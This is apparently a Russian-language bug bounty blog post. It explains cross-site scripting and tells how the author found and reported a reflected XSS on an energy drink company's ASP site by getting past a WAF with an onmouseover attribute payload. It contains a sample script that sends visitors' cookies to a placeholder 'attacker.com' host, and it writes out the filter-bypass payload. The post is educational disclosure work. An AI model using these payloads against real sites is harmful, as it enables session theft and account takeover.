Привет всем, я надеюсь, что у вас все хорошо и отлично! В этой статье мы поговорим о странном xss, который я нашел в одной из самых известных компаний по производству энергетических напитков (вы уже могли догадаться 😉)

Содержание этой статьи:

1- Что такое XSS?

2- История странного XSS.

Итак, давайте начнем наше хакерское путешествие.

#1. ЧТО ТАКОЕ XSS?

Вы когда-нибудь слышали термин «Javascript»? Если да, то хорошо, но если нет, то это не что иное, как язык программирования, наиболее часто используемый на стороне клиента (браузеры, такие как Firefox, Chrome и т. д.). Вы все, должно быть, посещали веб-сайты с очень причудливым внешним видом, анимацией и т. д. Ну, это возможно благодаря javascript. Он может контролировать всю веб-страницу и манипулировать ею по выбору разработчика!

Это очень удобно для разработчиков, поскольку они могут с легкостью добавлять больше дизайна, функций и т. д. с помощью Javascript. Но спросите себя, как вы думаете, что произойдет, если кто-то другой (злоумышленник) сможет написать свой собственный код javascript на чужом веб-сайте?

Вы уже могли догадаться 😉

Затем этот конкретный пользователь может манипулировать чьим-либо веб-сайтом без авторизации и может что-либо изменить или сделать что-либо на веб-странице.

Вот как работает межсайтовый скриптинг.

В общих чертах, МЕЖСАЙТСКИЙ СЦЕНАРИЙ (XSS) – это уязвимость веб-приложения, позволяющая злоумышленнику внедрить в веб-приложение собственный вредоносный код.

Теперь, достигнув xss, злоумышленник может:

1- Изменить содержимое страницы.

2- Украсть печенье.

3- Перенаправить пользователей.

4- Доставка вредоносных программ

и так далее…

Давайте посмотрим на один пример:

#Пример:

Предположим, функция комментариев Facebook уязвима для xss. Теперь злоумышленник зашел на страницу какой-то известной личности (скажем, Роналду) и в своем последнем посте прокомментировал:

‹script›document.location.href="https://attacker.com/?cookie=" + document.cookie‹/script›

Теперь этот код будет отправлять злоумышленнику куки каждого человека, посетившего пост Роналду. И, используя эти файлы cookie, злоумышленник теперь может получить полный контроль над учетной записью жертвы.

В этом случае каждый, кто увидит последний пост Роналду, станет жертвой злоумышленника и потеряет свой аккаунт в пользу злоумышленника. А так как Роналду — очень известная личность, злоумышленник может взломать как минимум 10 МИЛЛИОНОВ пользователей, просто воспользовавшись приведенным выше скриптом!!!!!!!!

Теперь я надеюсь, что вы поняли, что такое xss и почему это одна из самых опасных уязвимостей.

Чтобы узнать больше о xss, вы можете посетить этот веб-сайт:



Перейдем к нашей истории 😄

#2. История странного X S S

В сентябре месяце я начал охотиться за частной программой вознаграждения за ошибки, в которой есть все. Итак, я начал свой процесс разведки и начал искать некоторые распространенные уязвимости, такие как Open Redirection, CSRF и т. д. За 2–3 дня я нашел 9 уязвимостей в компании и сообщил обо всех. Но, к сожалению, все они были помечены либо как повторяющиеся, либо как неприменимые.

На следующий день я начал тестировать новое веб-приложение, которое работало на сервере ASP. Я попытался найти некоторые скрытые параметры с помощью некоторых инструментов, таких как FFUF и Paramspider, и нашел параметр menuid. Я перехватил запрос в burpsuite и попытался внедрить обычный тег ‹script›alert(1)‹/script›, но он был защищен и перенаправил меня на страницу NotFound.aspx. Я уже собирался сдаться, но потом подумал добавить ‹› к значению параметра, но результат все тот же😑

Затем я подумал, давайте закодируем специальные символы в URL и посмотрим, что произойдет после этого. Я закодировал ‹ в %3c и › в %3e, и, к моему удивлению, он отобразился!!

Затем я попытался внедрить ‹script›alert(1)‹/script›, но это не сработало. Похоже, серверная часть проверяла некоторые вредоносные теги, чтобы предотвратить xss. Через некоторое время я обнаружил, что когда я добавляю «/» в полезную нагрузку, он запускает WAF и перенаправляет меня на страницу NotFound.

Копнув глубже, я обнаружил, что полезная нагрузка отражалась в теге div. Что-то вроде этого:

‹div menuid="reflected_data"›‹/div›

Затем я попытался проверить, какие значения отражены на странице, и нашел:

«» → Отраженный

‹› → Отраженный

/ → Заблокировано

‹все между тегами› → Заблокировано

‹все → Отражено

›все → Отраженное

Проанализировав поведение веб-страницы, я пришел к выводу, что мы не можем использовать никакие теги, так как это сразу заблокирует нас. Итак, наша единственная цель — события javascript, такие как onmouseover, onclick и т. д.

Поэтому я создал полезную нагрузку ниже, используя приведенную выше информацию:

Бэтмен“ onmouseover=alert(1)›

поэтому, если я передам это значение в параметр, он закроет строку и позволит мне добавить такое событие:

‹div menuid=”batman” onmouseover=alert(1)› ”› ‹/div›

И БУМ! Это было отражено, и я получил SCARY ALERT 1 POP UP! 😁😁

Я сразу же сообщил об этой проблеме в компанию, и в благодарность они наградили меня 1 подносом своих энергетических напитков !!

я был как

Выводы:

1- Никогда не сдавайся.

2- Анализ веб-ответа и атака в соответствии с ним.

3- Следуйте по менее проторенной дороге.

4- Никогда не прекращайте учиться.

5- Попробуйте добавить специальные символы и посмотрите ответ.

Это все для этой статьи. Надеюсь, что вы узнали из него что-то новое. Дайте мне знать, если у вас есть сомнения относительно этой статьи или XSS 😄

Мы встретимся снова в следующей статье. До тех пор

Учетная запись LinkedIn: https://www.linkedin.com/in/faiyaz-ahmad-64457520b/

Аккаунт в Твиттере: https://twitter.com/FaIyaZz007

ОБНОВЛЕНИЕ: Если кто-то заинтересован во взломе Windows только с помощью python, он может записаться на курс ниже бесплатно! Просто используйте «FEBHACK» в купоне.

Ссылка на курс: https://www.udemy.com/course/hacking-windows-with-python-from-scratch-2022/?referralCode=1647ED5816EFD5D2F2EB